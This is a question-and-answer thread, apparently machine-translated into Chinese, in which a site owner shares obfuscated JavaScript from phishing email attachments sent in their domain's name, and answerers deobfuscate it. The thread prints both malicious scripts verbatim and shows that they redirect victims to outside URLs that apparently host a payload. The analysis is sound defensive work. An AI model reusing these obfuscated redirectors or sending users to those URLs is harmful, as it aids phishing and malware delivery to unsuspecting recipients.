我刚刚发现垃圾邮件发送者正在从我们的域名发送电子邮件,假装是我们,说:
尊敬的客户,
此电子邮件由ourwebsite.com发送 通知你我们有时间 阻止访问您的帐户。
我们有理由相信你的 帐户可能已被访问过 其他人。请运行附件 并按照说明进行操作。
(C)ourwebsite.com(我改变了)
附件是一个HTML文件,其中包含以下javascript:
<script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script>
另一封电子邮件:
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
有谁能告诉我它的作用?所以我们可以看看我们是否有漏洞,如果我们需要告诉客户这个漏洞......
由于
答案 0 :(得分:5)
脚本执行
document.location.href = "http://mvblaw.com/z.htm"; //Evil site (I assume)
它还包含大量无用的行来隐藏脚本的真正用途。
这里是解压缩的。
function mD() {};
this.aB = 43719;
mD.prototype = {
i: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
this.v = "v";
var q = 27427;
var m = new Date();
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new mD();
yY = "";
b.i();
this.xT = '';
清理混淆并添加有意义的名称,它变为
function TempClass() {};
this.aB = 43719;
TempClass.prototype = {
doIt: function () {
var w = new Date();
this.j = '';
var x = function () {};
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var d = new Date();
y = "";
aL = "";
var f = document;
var s = function () {};
this.yE = "";
aN = "";
var dL = '';
var iD = f['location'];
this.v = "v";
var q = 27427;
var m = new Date();
iD['href'] = a;
dE = '';
k = "";
var qY = function () {};
}
};
xO = false;
var b = new TempClass();
yY = "";
b.doIt();
this.xT = '';
删除所有无用的行,它变为
function TempClass() {};
TempClass.prototype = {
doIt: function () {
var a = "http://mvblaw.com/z.htm"; //Evil site (I assume)
var f = document;
var iD = f['location'];
iD['href'] = a;
}
};
var b = new TempClass();
b.doIt();
答案 1 :(得分:3)
没有天才,他们:
hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
h t t p : / / m v b l a w . c o m / z . h t m
f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
l o c a t i o n
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
h r e f
甚至不需要通过正则表达式运行它:)
我将假设他们攻击mvblaw并在那里窃听有效载荷页面。拥有VM的任何人都希望看到它的作用?
答案 2 :(得分:3)
脚本有很多无用的东西只是为了制造混乱,脚本的基本部分是:
function mD() {};
mD.prototype = {
i: function () {
// read between every two letters:
var a = 'hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'
.replace(/[gJG,\<]/g, '');
var f = document;
var iD = f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
}
};
var b = new mD();
b.i();
如果我们清理更多:
function mD() {};
mD.prototype = {
i: function () {
var a = 'http://mvblaw.com/z.htm';
var f = document;
var iD = f['location'];
iD['href'] = a;
}
};
var b = new mD();
b.i();
还有更多:
function mD() {};
mD.prototype = {
i: function () {
document.location.href = 'http://mvblaw.com/z.htm';
}
};
var b = new mD();
b.i();
答案 3 :(得分:0)
基本上,它似乎将(document['location'])['href'](或者,通常说document.location.href)设置为http://mvblaw.com/z.htm。
混淆代码非常简单,只需用任何内容替换噪声字符:
var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');
// a = http://mvblaw.com/z.htm
var f=document;
var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];
// iD = document.location
iD['hqrteqfH'.replace(/[Htqag]/g, '')] = a;
// document.location.href = a (the URL above).